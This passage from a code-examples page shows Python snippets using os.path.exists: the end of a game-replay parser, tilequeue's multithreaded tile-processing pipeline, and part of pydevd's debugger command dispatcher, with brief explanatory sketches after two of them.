			result_blocks['identify']['mapName'] = mapname
			
			
			result_blocks['identify']['mapid'] = result_blocks['datablock_advanced']['arenaTypeID']
			result_blocks['identify']['playername'] = result_blocks['datablock_advanced']['playername']
			result_blocks['identify']['replay_version'] = result_blocks['datablock_advanced']['replay_version']
			
			result_blocks['identify']['error'] = "none"
			result_blocks['identify']['error_details'] = "none"

			result_blocks['common']['datablock_advanced'] = 1

			if option_chat==1:
				result_blocks['chat'] = extract_chats(filename_source)
				result_blocks['common']['datablock_chat'] = 1
		else:
			result_blocks['common']['message'] = "replay incompatible"
			dumpjson(result_blocks, filename_source, 1)
		
		
		dumpjson(result_blocks, filename_source, 0)

	
	

	while numofblocks >= 1:
		try:
			printmessage("Retrieving data for block " + str(blockNum))
			f.seek(startPointer)
			size = f.read(4)
			datablockSize[blockNum] = struct.unpack("I", size)[0]
			datablockPointer[blockNum] = startPointer + 4
			startPointer=datablockPointer[blockNum]+datablockSize[blockNum]
			blockNum += 1
			numofblocks -= 1
		except Exception, e:
			result_blocks['common']['message'] = e.message
			dumpjson(result_blocks, filename_source, 1)
		
	processing_block = 0
	
	for i in datablockSize:
		
		processing_block += 1
		
		try:
			pass
		except Exception, e:
			result_blocks['common']['message'] = e.message
			dumpjson(result_blocks, filename_source, 1)
			
		printmessage("Retrieving block " + str(processing_block))
		f.seek(datablockPointer[i])
							
		myblock = f.read(int(datablockSize[i]))

		if 'arenaUniqueID' in myblock:

			if version_check(replay_version, "0.8.11.0") > -1 or myblock[0]=='[':
				br_json_list = dict()
		
				try:
					br_json_list = json.loads(myblock)
				except Exception, e:
					printmessage("Error with JSON: " + e.message)
				
				if len(br_json_list)==0:
					continue

				br_block = br_json_list[0]
				br_block['parser'] = dict()
				br_block['parser']['battleResultVersion'] = 14

				if version_check(replay_version, "0.9.8.0") > -1:
					br_block['parser'] = dict()
					br_block['parser']['battleResultVersion'] = 15
					if 'personal' in br_block:
						for vehTypeCompDescr, ownResults in br_block['personal'].copy().iteritems():
							if 'details' in ownResults:
								ownResults['details'] = decode_details(ownResults['details'])
								print ownResults['details']
								br_block['personal'][vehTypeCompDescr] = ownResults

					
				if 'datablock_1' in result_blocks:
					if len(br_json_list) > 0:
						result_blocks['datablock_1']['vehicles'] = br_json_list[1]

					if len(br_json_list) > 1:
						result_blocks['datablock_1']['kills'] = br_json_list[2]

			else:

				try:
					from SafeUnpickler import SafeUnpickler
					br_block = SafeUnpickler.loads(myblock)
					br_block['parser'] = dict()
					br_block['parser']['battleResultVersion'] = 14
				except Exception, e:
					printmessage("Error with unpickling myblock: " + e.message)

			if int(br_block['parser']['battleResultVersion']) < 15:
				if 'personal' in br_block:
					br_block['personal']['details'] = decode_details(br_block['personal']['details'])
					if 'vehicles' in br_block:
						for key, value in br_block['vehicles'].items():
							if 'details' in br_block['vehicles'][key]:
								del br_block['vehicles'][key]['details']
						
					
			result_blocks['datablock_battle_result'] = br_block

			result_blocks['common']['datablock_battle_result'] = 1
			result_blocks['identify']['arenaUniqueID'] = result_blocks['datablock_battle_result']['arenaUniqueID']

				
		else:
			blockdict = dict()
			try:
				blockdict = json.loads(myblock)
			except Exception, e:
				printmessage("Error with JSON: " + e.message)
			
			
			if 'clientVersionFromExe' in blockdict:
				replay_version = cleanReplayVersion(blockdict['clientVersionFromExe'])
				result_blocks['common']['replay_version'] = replay_version
				result_blocks['identify']['replay_version'] = replay_version
				replay_version_dict = replay_version.split('.')
				printmessage("Replay Version: " + str(replay_version))
			
			result_blocks['datablock_' + str(i)] = blockdict
			result_blocks['common']['datablock_' + str(i)] = 1

		result_blocks['common']['message'] = "ok"
	
	result_blocks = get_identify(result_blocks)
		
	if option_advanced==1 or option_chat==1:

		decfile = decrypt_file(filename_source, startPointer)
		uncompressed = decompress_file(decfile)
		if option_advanced==1:
			
			with open(uncompressed, 'rb') as f:
				if is_supported_replay(f):
					result_blocks['datablock_advanced'] = extract_advanced(uncompressed)
					result_blocks['common']['datablock_advanced'] = 1
				else:
					result_blocks['common']['datablock_advanced'] = 0
					result_blocks['common']['message'] = "Unsupported binary replay"
					dumpjson(result_blocks, filename_source, 0)

		if option_chat==1:
			import legacy
			result_blocks['chat_timestamp'] = legacy.Data(open(uncompressed, 'rb')).data[legacy.KEY.CHAT]
			result_blocks['chat'] = "<br/>".join([msg.encode("string-escape") for msg, timestamp in result_blocks['chat_timestamp']])
			result_blocks['common']['datablock_chat'] = 1

			result_blocks['bindata'] = legacy.Data(open(uncompressed, 'rb')).data
			
			
		
	dumpjson(result_blocks, filename_source, 0)
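
Example 104 guards its input with a combined check: os.path.exists, os.path.isfile, and os.access together ensure the replay path exists, is a regular file, and is readable before it is opened. A minimal sketch of the same guard (is_readable_file is a hypothetical name, not part of wotrp2j.py):

import os

def is_readable_file(path):
    # True only when the path exists, refers to a regular file rather than a
    # directory, and the current process has read permission on it.
    return (os.path.exists(path)
            and os.path.isfile(path)
            and os.access(path, os.R_OK))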

Example 105

Project: tilequeue
Source File: command.py
View license
def tilequeue_process(cfg, peripherals):
    logger = make_logger(cfg, 'process')
    logger.warn('tilequeue processing started')

    assert os.path.exists(cfg.query_cfg), \
        'Invalid query config path'

    with open(cfg.query_cfg) as query_cfg_fp:
        query_cfg = yaml.load(query_cfg_fp)
    all_layer_data, layer_data, post_process_data = (
        parse_layer_data(
            query_cfg, cfg.buffer_cfg, cfg.template_path, cfg.reload_templates,
            os.path.dirname(cfg.query_cfg)))

    formats = lookup_formats(cfg.output_formats)

    sqs_queue = peripherals.queue

    store = make_store(cfg.store_type, cfg.s3_bucket, cfg)

    assert cfg.postgresql_conn_info, 'Missing postgresql connection info'

    n_cpu = multiprocessing.cpu_count()
    sqs_messages_per_batch = 10
    n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
    if not n_simultaneous_query_sets:
        # default to number of databases configured
        n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
    assert n_simultaneous_query_sets > 0
    default_queue_buffer_size = 128
    n_layers = len(all_layer_data)
    n_formats = len(formats)
    n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
    if not n_simultaneous_s3_storage:
        n_simultaneous_s3_storage = max(n_cpu / 2, 1)
    assert n_simultaneous_s3_storage > 0

    # thread pool used for queries and uploading to s3
    n_total_needed_query = n_layers * n_simultaneous_query_sets
    n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
    n_total_needed = n_total_needed_query + n_total_needed_s3
    n_max_io_workers = 50
    n_io_workers = min(n_total_needed, n_max_io_workers)
    io_pool = ThreadPool(n_io_workers)

    feature_fetcher = DataFetcher(cfg.postgresql_conn_info, all_layer_data,
                                  io_pool, n_layers)

    # create all queues used to manage pipeline

    sqs_input_queue_buffer_size = sqs_messages_per_batch
    # holds coord messages from sqs
    sqs_input_queue = Queue.Queue(sqs_input_queue_buffer_size)

    # holds raw sql results - no filtering or processing done on them
    sql_data_fetch_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been filtered and processed
    # this is where the cpu intensive part of the operation will happen
    # the results will be data that is formatted for each necessary format
    processor_queue = multiprocessing.Queue(default_queue_buffer_size)

    # holds data after it has been sent to s3
    s3_store_queue = Queue.Queue(default_queue_buffer_size)

    # create worker threads/processes
    thread_sqs_queue_reader_stop = threading.Event()
    sqs_queue_reader = SqsQueueReader(sqs_queue, sqs_input_queue, logger,
                                      thread_sqs_queue_reader_stop)

    data_fetch = DataFetch(
        feature_fetcher, sqs_input_queue, sql_data_fetch_queue, io_pool,
        peripherals.redis_cache_index, logger)

    data_processor = ProcessAndFormatData(
        post_process_data, formats, sql_data_fetch_queue, processor_queue,
        cfg.layers_to_format, cfg.buffer_cfg, logger)

    s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool,
                           store, logger)

    thread_sqs_writer_stop = threading.Event()
    sqs_queue_writer = SqsQueueWriter(sqs_queue, s3_store_queue, logger,
                                      thread_sqs_writer_stop)

    def create_and_start_thread(fn, *args):
        t = threading.Thread(target=fn, args=args)
        t.start()
        return t

    thread_sqs_queue_reader = create_and_start_thread(sqs_queue_reader)

    threads_data_fetch = []
    threads_data_fetch_stop = []
    for i in range(n_simultaneous_query_sets):
        thread_data_fetch_stop = threading.Event()
        thread_data_fetch = create_and_start_thread(data_fetch,
                                                    thread_data_fetch_stop)
        threads_data_fetch.append(thread_data_fetch)
        threads_data_fetch_stop.append(thread_data_fetch_stop)

    # create a data processor per cpu
    n_data_processors = n_cpu
    data_processors = []
    data_processors_stop = []
    for i in range(n_data_processors):
        data_processor_stop = multiprocessing.Event()
        process_data_processor = multiprocessing.Process(
            target=data_processor, args=(data_processor_stop,))
        process_data_processor.start()
        data_processors.append(process_data_processor)
        data_processors_stop.append(data_processor_stop)

    threads_s3_storage = []
    threads_s3_storage_stop = []
    for i in range(n_simultaneous_s3_storage):
        thread_s3_storage_stop = threading.Event()
        thread_s3_storage = create_and_start_thread(s3_storage,
                                                    thread_s3_storage_stop)
        threads_s3_storage.append(thread_s3_storage)
        threads_s3_storage_stop.append(thread_s3_storage_stop)

    thread_sqs_writer = create_and_start_thread(sqs_queue_writer)

    if cfg.log_queue_sizes:
        assert(cfg.log_queue_sizes_interval_seconds > 0)
        queue_data = (
            (sqs_input_queue, 'sqs'),
            (sql_data_fetch_queue, 'sql'),
            (processor_queue, 'proc'),
            (s3_store_queue, 's3'),
        )
        queue_printer_thread_stop = threading.Event()
        queue_printer = QueuePrint(
            cfg.log_queue_sizes_interval_seconds, queue_data, logger,
            queue_printer_thread_stop)
        queue_printer_thread = create_and_start_thread(queue_printer)
    else:
        queue_printer_thread = None
        queue_printer_thread_stop = None

    def stop_all_workers(signum, stack):
        logger.warn('tilequeue processing shutdown ...')

        logger.info('requesting all workers (threads and processes) stop ...')

        # each worker guards its read loop with an event object
        # ask all these to stop first

        thread_sqs_queue_reader_stop.set()
        for thread_data_fetch_stop in threads_data_fetch_stop:
            thread_data_fetch_stop.set()
        for data_processor_stop in data_processors_stop:
            data_processor_stop.set()
        for thread_s3_storage_stop in threads_s3_storage_stop:
            thread_s3_storage_stop.set()
        thread_sqs_writer_stop.set()

        if queue_printer_thread_stop:
            queue_printer_thread_stop.set()

        logger.info('requesting all workers (threads and processes) stop ... '
                    'done')

        # Once workers receive a stop event, they will keep reading
        # from their queues until they receive a sentinel value. This
        # is mandatory so that no messages will remain on queues when
        # asked to join. Otherwise, we never terminate.

        logger.info('joining all workers ...')

        logger.info('joining sqs queue reader ...')
        thread_sqs_queue_reader.join()
        logger.info('joining sqs queue reader ... done')
        logger.info('enqueueing sentinels for data fetchers ...')
        for i in range(len(threads_data_fetch)):
            sqs_input_queue.put(None)
        logger.info('enqueueing sentinels for data fetchers ... done')
        logger.info('joining data fetchers ...')
        for thread_data_fetch in threads_data_fetch:
            thread_data_fetch.join()
        logger.info('joining data fetchers ... done')
        logger.info('enqueueing sentinels for data processors ...')
        for i in range(len(data_processors)):
            sql_data_fetch_queue.put(None)
        logger.info('enqueueing sentinels for data processors ... done')
        logger.info('joining data processors ...')
        for data_processor in data_processors:
            data_processor.join()
        logger.info('joining data processors ... done')
        logger.info('enqueueing sentinels for s3 storage ...')
        for i in range(len(threads_s3_storage)):
            processor_queue.put(None)
        logger.info('enqueueing sentinels for s3 storage ... done')
        logger.info('joining s3 storage ...')
        for thread_s3_storage in threads_s3_storage:
            thread_s3_storage.join()
        logger.info('joining s3 storage ... done')
        logger.info('enqueueing sentinel for sqs queue writer ...')
        s3_store_queue.put(None)
        logger.info('enqueueing sentinel for sqs queue writer ... done')
        logger.info('joining sqs queue writer ...')
        thread_sqs_writer.join()
        logger.info('joining sqs queue writer ... done')
        if queue_printer_thread:
            logger.info('joining queue printer ...')
            queue_printer_thread.join()
            logger.info('joining queue printer ... done')

        logger.info('joining all workers ... done')

        logger.info('joining io pool ...')
        io_pool.close()
        io_pool.join()
        logger.info('joining io pool ... done')

        logger.info('joining multiprocess data fetch queue ...')
        sql_data_fetch_queue.close()
        sql_data_fetch_queue.join_thread()
        logger.info('joining multiprocess data fetch queue ... done')

        logger.info('joining multiprocess process queue ...')
        processor_queue.close()
        processor_queue.join_thread()
        logger.info('joining multiprocess process queue ... done')

        logger.warn('tilequeue processing shutdown ... done')
        sys.exit(0)

    signal.signal(signal.SIGTERM, stop_all_workers)
    signal.signal(signal.SIGINT, stop_all_workers)
    signal.signal(signal.SIGQUIT, stop_all_workers)

    logger.warn('all tilequeue threads and processes started')

    # this is necessary for the main thread to receive signals
    # when joining on threads/processes, the signal is never received
    # http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
    while True:
        time.sleep(1024)
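
Example 105 uses os.path.exists as a fail-fast startup check: the query config path is asserted to exist before the YAML file is opened, so a bad path aborts immediately with a readable message instead of failing deep inside the pipeline. A minimal sketch of that pattern (require_existing_file is a hypothetical helper, not part of tilequeue):

import os

def require_existing_file(path, what='config'):
    # Abort early with a clear message when a required file is missing.
    assert os.path.exists(path), 'Invalid {0} path: {1}'.format(what, path)
    return path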

Example 106

View license
def process_net_command(py_db, cmd_id, seq, text):
    '''Processes a command received from the Java side

    @param cmd_id: the id of the command
    @param seq: the sequence of the command
    @param text: the text received in the command

    @note: this method is run as a big switch... after doing some tests, it's not clear whether changing it for
    a dict id --> function call will have better performance result. A simple test with xrange(10000000) showed
    that the gains from having a fast access to what should be executed are lost because of the function call in
    a way that if we had 10 elements in the switch the if..elif are better -- but growing the number of choices
    makes the solution with the dispatch look better -- so, if this gets more than 20-25 choices at some time,
    it may be worth refactoring it (actually, reordering the ifs so that the ones used mostly come before
    probably will give better performance).
    '''
    # print(ID_TO_MEANING[str(cmd_id)], repr(text))
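    # Illustrative aside, not part of pydevd: the docstring above weighs this
    # if/elif chain against a dict-based dispatch. Such a table would look
    # roughly like
    #     handlers = {CMD_RUN: handle_run, CMD_VERSION: handle_version, ...}
    #     handler = handlers.get(cmd_id)
    #     if handler is not None:
    #         cmd = handler(py_db, seq, text)
    # trading the linear scan for one dict lookup plus a function call per
    # command; handle_run and handle_version are hypothetical names used only
    # for illustration.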

    py_db._main_lock.acquire()
    try:
        try:
            cmd = None
            if cmd_id == CMD_RUN:
                py_db.ready_to_run = True

            elif cmd_id == CMD_VERSION:
                # response is version number
                # ide_os should be 'WINDOWS' or 'UNIX'.
                ide_os = 'WINDOWS'

                # Breakpoints can be grouped by 'LINE' or by 'ID'.
                breakpoints_by = 'LINE'

                splitted = text.split('\t')
                if len(splitted) == 1:
                    _local_version = splitted

                elif len(splitted) == 2:
                    _local_version, ide_os = splitted

                elif len(splitted) == 3:
                    _local_version, ide_os, breakpoints_by = splitted

                if breakpoints_by == 'ID':
                    py_db._set_breakpoints_with_id = True
                else:
                    py_db._set_breakpoints_with_id = False

                pydevd_file_utils.set_ide_os(ide_os)

                cmd = py_db.cmd_factory.make_version_message(seq)

            elif cmd_id == CMD_LIST_THREADS:
                # response is a list of threads
                cmd = py_db.cmd_factory.make_list_threads_message(seq)

            elif cmd_id == CMD_THREAD_KILL:
                int_cmd = InternalTerminateThread(text)
                py_db.post_internal_command(int_cmd, text)

            elif cmd_id == CMD_THREAD_SUSPEND:
                # Yes, thread suspend is still done at this point, not through an internal command!
                t = pydevd_find_thread_by_id(text)
                if t:
                    additional_info = None
                    try:
                        additional_info = t.additional_info
                    except AttributeError:
                        pass  # that's ok, no info currently set

                    if additional_info is not None:
                        for frame in additional_info.iter_frames(t):
                            py_db.set_trace_for_frame_and_parents(frame)
                            del frame

                    py_db.set_suspend(t, CMD_THREAD_SUSPEND)
                elif text.startswith('__frame__:'):
                    sys.stderr.write("Can't suspend tasklet: %s\n" % (text,))

            elif cmd_id == CMD_THREAD_RUN:
                t = pydevd_find_thread_by_id(text)
                if t:
                    thread_id = get_thread_id(t)
                    int_cmd = InternalRunThread(thread_id)
                    py_db.post_internal_command(int_cmd, thread_id)

                elif text.startswith('__frame__:'):
                    sys.stderr.write("Can't make tasklet run: %s\n" % (text,))


            elif cmd_id == CMD_STEP_INTO or cmd_id == CMD_STEP_OVER or cmd_id == CMD_STEP_RETURN or \
                    cmd_id == CMD_STEP_INTO_MY_CODE:
                # we received some command to make a single step
                t = pydevd_find_thread_by_id(text)
                if t:
                    thread_id = get_thread_id(t)
                    int_cmd = InternalStepThread(thread_id, cmd_id)
                    py_db.post_internal_command(int_cmd, thread_id)

                elif text.startswith('__frame__:'):
                    sys.stderr.write("Can't make tasklet step command: %s\n" % (text,))


            elif cmd_id == CMD_RUN_TO_LINE or cmd_id == CMD_SET_NEXT_STATEMENT or cmd_id == CMD_SMART_STEP_INTO:
                # we received some command to make a single step
                thread_id, line, func_name = text.split('\t', 2)
                t = pydevd_find_thread_by_id(thread_id)
                if t:
                    int_cmd = InternalSetNextStatementThread(thread_id, cmd_id, line, func_name)
                    py_db.post_internal_command(int_cmd, thread_id)
                elif thread_id.startswith('__frame__:'):
                    sys.stderr.write("Can't set next statement in tasklet: %s\n" % (thread_id,))


            elif cmd_id == CMD_RELOAD_CODE:
                # we received some command to make a reload of a module
                module_name = text.strip()

                thread_id = '*'  # Any thread

                # Note: not going for the main thread because in this case it'd only do the load
                # when we stopped on a breakpoint.
                # for tid, t in py_db._running_thread_ids.items(): #Iterate in copy
                #    thread_name = t.getName()
                #
                #    print thread_name, get_thread_id(t)
                #    #Note: if possible, try to reload on the main thread
                #    if thread_name == 'MainThread':
                #        thread_id = tid

                int_cmd = ReloadCodeCommand(module_name, thread_id)
                py_db.post_internal_command(int_cmd, thread_id)


            elif cmd_id == CMD_CHANGE_VARIABLE:
                # the text is: thread\tstackframe\tFRAME|GLOBAL\tattribute_to_change\tvalue_to_change
                try:
                    thread_id, frame_id, scope, attr_and_value = text.split('\t', 3)

                    tab_index = attr_and_value.rindex('\t')
                    attr = attr_and_value[0:tab_index].replace('\t', '.')
                    value = attr_and_value[tab_index + 1:]
                    int_cmd = InternalChangeVariable(seq, thread_id, frame_id, scope, attr, value)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_VARIABLE:
                # we received some command to get a variable
                # the text is: thread_id\tframe_id\tFRAME|GLOBAL\tattributes*
                try:
                    thread_id, frame_id, scopeattrs = text.split('\t', 2)

                    if scopeattrs.find('\t') != -1:  # there are attributes beyond scope
                        scope, attrs = scopeattrs.split('\t', 1)
                    else:
                        scope, attrs = (scopeattrs, None)

                    int_cmd = InternalGetVariable(seq, thread_id, frame_id, scope, attrs)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_ARRAY:
                # we received some command to get an array variable
                # the text is: thread_id\tframe_id\tFRAME|GLOBAL\tname\ttemp\troffs\tcoffs\trows\tcols\tformat
                try:
                    roffset, coffset, rows, cols, format, thread_id, frame_id, scopeattrs  = text.split('\t', 7)

                    if scopeattrs.find('\t') != -1:  # there are attributes beyond scope
                        scope, attrs = scopeattrs.split('\t', 1)
                    else:
                        scope, attrs = (scopeattrs, None)

                    int_cmd = InternalGetArray(seq, roffset, coffset, rows, cols, format, thread_id, frame_id, scope, attrs)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_COMPLETIONS:
                # we received some command to get a variable
                # the text is: thread_id\tframe_id\tactivation token
                try:
                    thread_id, frame_id, scope, act_tok = text.split('\t', 3)

                    int_cmd = InternalGetCompletions(seq, thread_id, frame_id, act_tok)
                    py_db.post_internal_command(int_cmd, thread_id)

                except:
                    traceback.print_exc()

            elif cmd_id == CMD_GET_FRAME:
                thread_id, frame_id, scope = text.split('\t', 2)

                int_cmd = InternalGetFrame(seq, thread_id, frame_id)
                py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_SET_BREAK:
                # func name: 'None': match anything. Empty: match global, specified: only method context.
                # command to add some breakpoint.
                # text is file\tline. Add to breakpoints dictionary
                if py_db._set_breakpoints_with_id:
                    breakpoint_id, type, file, line, func_name, condition, expression = text.split('\t', 6)

                    breakpoint_id = int(breakpoint_id)
                    line = int(line)

                    # We must restore new lines and tabs as done in
                    # AbstractDebugTarget.breakpointAdded
                    condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n').\
                        replace("@_@TAB_CHAR@_@", '\t').strip()

                    expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n').\
                        replace("@_@TAB_CHAR@_@", '\t').strip()
                else:
                    #Note: this else should be removed after PyCharm migrates to setting
                    #breakpoints by id (and ideally also provides func_name).
                    type, file, line, func_name, condition, expression = text.split('\t', 5)
                    # If we don't have an id given for each breakpoint, consider
                    # the id to be the line.
                    breakpoint_id = line = int(line)

                    condition = condition.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
                        replace("@_@TAB_CHAR@_@", '\t').strip()

                    expression = expression.replace("@_@NEW_LINE_CHAR@_@", '\n'). \
                        replace("@_@TAB_CHAR@_@", '\t').strip()

                if not IS_PY3K:  # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
                    file = file.encode(file_system_encoding)

                file = pydevd_file_utils.norm_file_to_server(file)

                if not pydevd_file_utils.exists(file):
                    sys.stderr.write('pydev debugger: warning: trying to add breakpoint'\
                        ' to file that does not exist: %s (will have no effect)\n' % (file,))
                    sys.stderr.flush()


                if len(condition) <= 0 or condition is None or condition == "None":
                    condition = None

                if len(expression) <= 0 or expression is None or expression == "None":
                    expression = None

                supported_type = False
                if type == 'python-line':
                    breakpoint = LineBreakpoint(line, condition, func_name, expression)
                    breakpoints = py_db.breakpoints
                    file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
                    supported_type = True
                else:
                    result = None
                    plugin = py_db.get_plugin_lazy_init()
                    if plugin is not None:
                        result = plugin.add_breakpoint('add_line_breakpoint', py_db, type, file, line, condition, expression, func_name)
                    if result is not None:
                        supported_type = True
                        breakpoint, breakpoints = result
                        file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
                    else:
                        supported_type = False

                if not supported_type:
                    raise NameError(type)

                if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
                    pydev_log.debug('Added breakpoint:%s - line:%s - func_name:%s\n' % (file, line, func_name.encode('utf-8')))
                    sys.stderr.flush()

                if dict_contains(file_to_id_to_breakpoint, file):
                    id_to_pybreakpoint = file_to_id_to_breakpoint[file]
                else:
                    id_to_pybreakpoint = file_to_id_to_breakpoint[file] = {}

                id_to_pybreakpoint[breakpoint_id] = breakpoint
                py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
                if py_db.plugin is not None:
                    py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()

                py_db.set_tracing_for_untraced_contexts(overwrite_prev_trace=True)

            elif cmd_id == CMD_REMOVE_BREAK:
                #command to remove some breakpoint
                #text is type\tfile\tid. Remove from breakpoints dictionary
                breakpoint_type, file, breakpoint_id = text.split('\t', 2)

                if not IS_PY3K:  # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
                    file = file.encode(file_system_encoding)

                file = pydevd_file_utils.norm_file_to_server(file)

                try:
                    breakpoint_id = int(breakpoint_id)
                except ValueError:
                    pydev_log.error('Error removing breakpoint. Expected breakpoint_id to be an int. Found: %s' % (breakpoint_id,))

                else:
                    file_to_id_to_breakpoint = None
                    if breakpoint_type == 'python-line':
                        breakpoints = py_db.breakpoints
                        file_to_id_to_breakpoint = py_db.file_to_id_to_line_breakpoint
                    elif py_db.get_plugin_lazy_init() is not None:
                        result = py_db.plugin.get_breakpoints(py_db, breakpoint_type)
                        if result is not None:
                            file_to_id_to_breakpoint = py_db.file_to_id_to_plugin_breakpoint
                            breakpoints = result

                    if file_to_id_to_breakpoint is None:
                        pydev_log.error("Error removing breakpoint. Can't handle breakpoint of type %s" % breakpoint_type)
                    else:
                        try:
                            id_to_pybreakpoint = file_to_id_to_breakpoint.get(file, {})
                            if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
                                existing = id_to_pybreakpoint[breakpoint_id]
                                sys.stderr.write('Removed breakpoint:%s - line:%s - func_name:%s (id: %s)\n' % (
                                    file, existing.line, existing.func_name.encode('utf-8'), breakpoint_id))

                            del id_to_pybreakpoint[breakpoint_id]
                            py_db.consolidate_breakpoints(file, id_to_pybreakpoint, breakpoints)
                            if py_db.plugin is not None:
                                py_db.has_plugin_line_breaks = py_db.plugin.has_line_breaks()

                        except KeyError:
                            pydev_log.error("Error removing breakpoint: Breakpoint id not found: %s id: %s. Available ids: %s\n" % (
                                file, breakpoint_id, dict_keys(id_to_pybreakpoint)))


            elif cmd_id == CMD_EVALUATE_EXPRESSION or cmd_id == CMD_EXEC_EXPRESSION:
                #command to evaluate the given expression
                #text is: thread\tstackframe\tLOCAL\texpression
                thread_id, frame_id, scope, expression, trim = text.split('\t', 4)
                int_cmd = InternalEvaluateExpression(seq, thread_id, frame_id, expression,
                    cmd_id == CMD_EXEC_EXPRESSION, int(trim) == 1)
                py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_CONSOLE_EXEC:
                #command to exec expression in console, in case expression is only partially valid 'False' is returned
                #text is: thread\tstackframe\tLOCAL\texpression

                thread_id, frame_id, scope, expression = text.split('\t', 3)

                int_cmd = InternalConsoleExec(seq, thread_id, frame_id, expression)
                py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_SET_PY_EXCEPTION:
                # Command which receives set of exceptions on which user wants to break the debugger
                # text is: break_on_uncaught;break_on_caught;TypeError;ImportError;zipimport.ZipImportError;
                # This API is optional and works 'in bulk' -- it's possible
                # to get finer-grained control with CMD_ADD_EXCEPTION_BREAK/CMD_REMOVE_EXCEPTION_BREAK
                # which allows setting caught/uncaught per exception.
                #
                splitted = text.split(';')
                py_db.break_on_uncaught_exceptions = {}
                py_db.break_on_caught_exceptions = {}
                added = []
                if len(splitted) >= 4:
                    if splitted[0] == 'true':
                        break_on_uncaught = True
                    else:
                        break_on_uncaught = False

                    if splitted[1] == 'true':
                        break_on_caught = True
                    else:
                        break_on_caught = False

                    if splitted[2] == 'true':
                        py_db.break_on_exceptions_thrown_in_same_context = True
                    else:
                        py_db.break_on_exceptions_thrown_in_same_context = False

                    if splitted[3] == 'true':
                        py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = True
                    else:
                        py_db.ignore_exceptions_thrown_in_lines_with_ignore_exception = False

                    for exception_type in splitted[4:]:
                        exception_type = exception_type.strip()
                        if not exception_type:
                            continue

                        exception_breakpoint = py_db.add_break_on_exception(
                            exception_type,
                            notify_always=break_on_caught,
                            notify_on_terminate=break_on_uncaught,
                            notify_on_first_raise_only=False,
                        )
                        if exception_breakpoint is None:
                            continue
                        added.append(exception_breakpoint)

                    py_db.update_after_exceptions_added(added)

                else:
                    sys.stderr.write("Error when setting exception list. Received: %s\n" % (text,))

            elif cmd_id == CMD_GET_FILE_CONTENTS:

                if not IS_PY3K:  # In Python 3, the frame object will have unicode for the file, whereas on python 2 it has a byte-array encoded with the filesystem encoding.
                    text = text.encode(file_system_encoding)

                if os.path.exists(text):
                    f = open(text, 'r')
                    try:
                        source = f.read()
                    finally:
                        f.close()
                    cmd = py_db.cmd_factory.make_get_file_contents(seq, source)

            elif cmd_id == CMD_SET_PROPERTY_TRACE:
                # Command which receives whether to trace property getter/setter/deleter
                # text is feature_state(true/false);disable_getter/disable_setter/disable_deleter
                if text != "":
                    splitted = text.split(';')
                    if len(splitted) >= 4:
                        if py_db.disable_property_trace is False and splitted[0] == 'true':
                            # Replacing property by custom property only when the debugger starts
                            pydevd_traceproperty.replace_builtin_property()
                            py_db.disable_property_trace = True
                        # Enable/Disable tracing of the property getter
                        if splitted[1] == 'true':
                            py_db.disable_property_getter_trace = True
                        else:
                            py_db.disable_property_getter_trace = False
                        # Enable/Disable tracing of the property setter
                        if splitted[2] == 'true':
                            py_db.disable_property_setter_trace = True
                        else:
                            py_db.disable_property_setter_trace = False
                        # Enable/Disable tracing of the property deleter
                        if splitted[3] == 'true':
                            py_db.disable_property_deleter_trace = True
                        else:
                            py_db.disable_property_deleter_trace = False
                else:
                    # User hasn't configured any settings for property tracing
                    pass

            elif cmd_id == CMD_ADD_EXCEPTION_BREAK:
                if text.find('\t') != -1:
                    exception, notify_always, notify_on_terminate, ignore_libraries = text.split('\t', 3)
                else:
                    exception, notify_always, notify_on_terminate, ignore_libraries = text, 0, 0, 0

                if exception.find('-') != -1:
                    breakpoint_type, exception = exception.split('-')
                else:
                    breakpoint_type = 'python'

                if breakpoint_type == 'python':
                    if int(notify_always) == 1:
                        pydev_log.warn("Deprecated parameter: 'notify always' policy removed in PyCharm\n")
                    exception_breakpoint = py_db.add_break_on_exception(
                        exception,
                        notify_always=int(notify_always) > 0,
                        notify_on_terminate = int(notify_on_terminate) == 1,
                        notify_on_first_raise_only=int(notify_always) == 2,
                        ignore_libraries=int(ignore_libraries) > 0
                    )

                    if exception_breakpoint is not None:
                        py_db.update_after_exceptions_added([exception_breakpoint])
                else:
                    supported_type = False
                    plugin = py_db.get_plugin_lazy_init()
                    if plugin is not None:
                        supported_type = plugin.add_breakpoint('add_exception_breakpoint', py_db, breakpoint_type, exception)

                    if supported_type:
                        py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
                    else:
                        raise NameError(breakpoint_type)



            elif cmd_id == CMD_REMOVE_EXCEPTION_BREAK:
                exception = text
                if exception.find('-') != -1:
                    exception_type, exception = exception.split('-')
                else:
                    exception_type = 'python'

                if exception_type == 'python':
                    try:
                        cp = py_db.break_on_uncaught_exceptions.copy()
                        dict_pop(cp, exception, None)
                        py_db.break_on_uncaught_exceptions = cp

                        cp = py_db.break_on_caught_exceptions.copy()
